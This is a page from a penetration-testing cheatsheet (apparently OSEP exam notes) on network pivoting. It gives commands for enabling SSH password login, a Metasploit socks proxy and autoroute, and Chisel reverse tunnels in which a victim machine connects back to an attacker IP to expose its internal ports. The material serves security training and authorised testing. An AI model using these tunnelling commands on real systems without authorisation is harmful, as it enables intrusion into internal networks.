Awesome Hackpuntes
  • Intro
  • My CVE
  • Exploit-DB
    • XMLBlueprint <= 16.191112 - XML External Entity Injection
    • Easy XML Editor <= 1.7.8 - XML External Entity Injection
    • winrar 5.80 64bit - Denial of Service
    • rConfig 3.9.2 - Remote Code Execution
    • XML Notepad 2.8.0.4 - XML External Entity Injection
    • IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path
  • OWASP - EN
    • OWASP: Testing guide checklist
  • OWASP - ES
    • [INFO] RECOPILACIÓN DE INFORMACIÓN
    • [CONFIG] GESTIÓN DE CONFIGURACIÓN E IMPLEMENTACIÓN
    • OWASP: Guía de pruebas
  • Page 1
  • 🕵️OSEP Cheatsheet
    • Checklist
    • Online Tools
    • AV Evasion
    • File transfer
    • Exfiltrate Data
    • Interesting files
    • Network Forwarding
    • Tools
    • CRTO Cheat Sheet
    • Page
    • Page 3
    • Page 4
  • 📱Mobile Pentesting
  • 🤖Android
    • Page 2
  • 💸iOS
    • How to extract IPA from iOS device
Powered by GitBook
On this page
  • SSH
  • Metasploit
  • Chisel

Was this helpful?

  1. OSEP Cheatsheet

Network Forwarding

SSH

Enable password authentication

sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/g' /etc/ssh/sshd_config

Reboot ssh service

sudo systemctl start ssh.service

Metasploit

Use proxy

use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set srvport 1080
set version 4a # proxychains.conf socks4 127.0.0.1 1080
exploit

Autoroute

use multi/manage/autoroute
set session 1
exploit

Check proxy

netstat -an | grep :1080

Chisel

Socks Proxy

# Attacker
chisel server -p 8080 --socks5 --reverse

# Victim
.\chisel.exe client <attacker-ip>:8080 R:1080:socks

# sudo nano /etc/proxychains.conf
socks5 127.0.0.1 1080

Port forwarding, attacker port 3306 (R:3306) -> victim 3306 (127.0.0.1:3306/tcp).

# Attacker
chisel server -p 8080 --reverse

# Victim
.\chisel.exe client <attacker-ip>:8080 R:3306:127.0.0.1:3306/tcp
PreviousInteresting filesNextTools

Last updated 1 year ago

Was this helpful?

🕵️